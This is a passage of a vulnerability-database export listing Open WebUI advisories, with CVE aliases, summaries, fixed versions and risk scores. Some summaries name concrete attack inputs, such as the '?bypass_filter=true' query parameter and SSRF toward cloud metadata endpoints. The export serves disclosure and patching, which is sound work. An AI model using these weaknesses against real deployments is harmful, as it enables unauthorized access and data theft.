| vulnerability |
VCID-yug9-shts-kufb |
|
| 47 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 48 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0 |
|
|
| aliases |
CVE-2026-45667, GHSA-m69w-p7m4-585j
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-66zh-9jk7-9bfx |
|
| 15 |
| url |
VCID-6rbm-rm25-hqgy |
| vulnerability_id |
VCID-6rbm-rm25-hqgy |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.11 |
| purl |
pkg:pypi/open-webui@0.8.11 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 13 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 14 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 15 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 16 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 17 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 18 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 19 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 20 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 21 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 22 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 23 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 24 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 25 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 26 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 27 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 28 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 29 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 30 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 31 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 32 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 33 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 34 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 35 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 36 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 37 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 38 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11 |
|
|
| aliases |
CVE-2026-45365, GHSA-v6qf-75pr-p96m
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-6rbm-rm25-hqgy |
|
| 16 |
| url |
VCID-7j5a-pu4k-kucf |
| vulnerability_id |
VCID-7j5a-pu4k-kucf |
| summary |
open-webui v0.6.33 is vulnerable to Incorrect Access Control. The API /api/tasks/stop/ directly accesses and cancels tasks without verifying user ownership, enabling attackers (a normal user) to stop arbitrary LLM response tasks. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.6.34 |
| purl |
pkg:pypi/open-webui@0.6.34 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2rs8-62x1-s7h7 |
|
| 4 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 5 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 6 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 7 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 8 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 9 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 10 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 11 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 12 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 13 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 14 |
| vulnerability |
VCID-66zh-9jk7-9bfx |
|
| 15 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 16 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 17 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 18 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 19 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 20 |
| vulnerability |
VCID-94nj-qkdf-xfhn |
|
| 21 |
| vulnerability |
VCID-9jud-sr2a-8yc3 |
|
| 22 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 23 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 24 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 25 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 26 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 27 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 28 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 29 |
| vulnerability |
VCID-jnsg-u9dy-r3d5 |
|
| 30 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 31 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 32 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 33 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 34 |
| vulnerability |
VCID-pvep-chj7-ekeg |
|
| 35 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 36 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 37 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 38 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 39 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 40 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 41 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 42 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 43 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 44 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 45 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 46 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 47 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 48 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 49 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 50 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 51 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 52 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 53 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 54 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.34 |
|
|
| aliases |
CVE-2025-63681, GHSA-frv8-gffc-37px
|
| risk_score |
1.9 |
| exploitability |
0.5 |
| weighted_severity |
3.9 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7j5a-pu4k-kucf |
|
| 17 |
| url |
VCID-7nbc-ng1s-suck |
| vulnerability_id |
VCID-7nbc-ng1s-suck |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.6 |
| purl |
pkg:pypi/open-webui@0.8.6 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 13 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 14 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 15 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 16 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 17 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 18 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 19 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 20 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 21 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 22 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 23 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 24 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 25 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 26 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 27 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 28 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 29 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 30 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 31 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 32 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 33 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 34 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 35 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 36 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 37 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 38 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 39 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 40 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 41 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 42 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6 |
|
|
| aliases |
CVE-2026-29071, GHSA-w9f8-gxf9-rhvw
|
| risk_score |
1.4 |
| exploitability |
0.5 |
| weighted_severity |
2.8 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-7nbc-ng1s-suck |
|
| 18 |
| url |
VCID-8n6u-wgz9-1bgj |
| vulnerability_id |
VCID-8n6u-wgz9-1bgj |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an unsanitized filename field in the speech-to-text transcription endpoint allows any authenticated non-admin user to trigger a `FileNotFoundError` whose message — including the server's absolute `DATA_DIR` path — is returned verbatim in the HTTP 400 response body, confirming information disclosure on all default deployments. Version 0.8.6 patches the issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.6 |
| purl |
pkg:pypi/open-webui@0.8.6 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 13 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 14 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 15 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 16 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 17 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 18 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 19 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 20 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 21 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 22 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 23 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 24 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 25 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 26 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 27 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 28 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 29 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 30 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 31 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 32 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 33 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 34 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 35 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 36 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 37 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 38 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 39 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 40 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 41 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 42 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6 |
|
|
| aliases |
CVE-2026-28786, GHSA-vvxm-vxmr-624h
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-8n6u-wgz9-1bgj |
|
| 19 |
| url |
VCID-8nzh-cpda-dkca |
| vulnerability_id |
VCID-8nzh-cpda-dkca |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the POST /api/v1/notes/{id}/pin endpoint performs a write operation (toggling the is_pinned field) but only checks for read permission. Users with read-only access to a shared note can pin/unpin it, which is a state-modifying action that should require write permission. This vulnerability is fixed in 0.9.3. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45316, GHSA-jx2x-j75f-xq3j
|
| risk_score |
1.6 |
| exploitability |
0.5 |
| weighted_severity |
3.1 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-8nzh-cpda-dkca |
|
| 20 |
| url |
VCID-8y4k-pj2n-8uhm |
| vulnerability_id |
VCID-8y4k-pj2n-8uhm |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the channel webhook create/update flow accepts arbitrary profile_image_url values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves this SVG as image/svg+xml without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser. This vulnerability is fixed in 0.9.3. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/open-webui/open-webui |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
6.1 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
|
| 1 |
| value |
7.4 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/open-webui/open-webui |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-45314, GHSA-3856-3vxq-m6fc
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-8y4k-pj2n-8uhm |
|
| 21 |
| url |
VCID-94nj-qkdf-xfhn |
| vulnerability_id |
VCID-94nj-qkdf-xfhn |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.6.37 |
| purl |
pkg:pypi/open-webui@0.6.37 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2rs8-62x1-s7h7 |
|
| 4 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 5 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 6 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 7 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 8 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 9 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 10 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 11 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 12 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 13 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 14 |
| vulnerability |
VCID-66zh-9jk7-9bfx |
|
| 15 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 16 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 17 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 18 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 19 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 20 |
| vulnerability |
VCID-9jud-sr2a-8yc3 |
|
| 21 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 22 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 23 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 24 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 25 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 26 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 27 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 28 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 29 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 30 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 31 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 32 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 33 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 34 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 35 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 36 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 37 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 38 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 39 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 40 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 41 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 42 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 43 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 44 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 45 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 46 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 47 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 48 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 49 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 50 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 51 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.37 |
|
|
| aliases |
CVE-2025-65958, GHSA-c6xv-rcvw-v685
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-94nj-qkdf-xfhn |
|
| 22 |
| url |
VCID-9jud-sr2a-8yc3 |
| vulnerability_id |
VCID-9jud-sr2a-8yc3 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.0 |
| purl |
pkg:pypi/open-webui@0.8.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 7 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 8 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 9 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 10 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 11 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 12 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 13 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 14 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 15 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 16 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 17 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 18 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 19 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 20 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 21 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 22 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 23 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 24 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 25 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 26 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 27 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 28 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 29 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 30 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 31 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 32 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 33 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 34 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 35 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 36 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 37 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 38 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 39 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 40 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 41 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 42 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 43 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 44 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 45 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 46 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 47 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 48 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0 |
|
|
| aliases |
CVE-2026-44549, GHSA-jwf8-pv5p-vhmc
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-9jud-sr2a-8yc3 |
|
| 23 |
| url |
VCID-chug-ma8r-cucc |
| vulnerability_id |
VCID-chug-ma8r-cucc |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the _validate_collection_access function uses an incomplete allowlist that only enforces ownership checks for collections matching user-memory-* and file-* patterns. All other collection names pass through unchecked — including the system-level knowledge-bases meta-collection, which stores the IDs, names, and descriptions of every knowledge base on the instance. Any authenticated user can query this meta-collection directly via the retrieval query endpoints to obtain a global index of all knowledge bases across all users. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
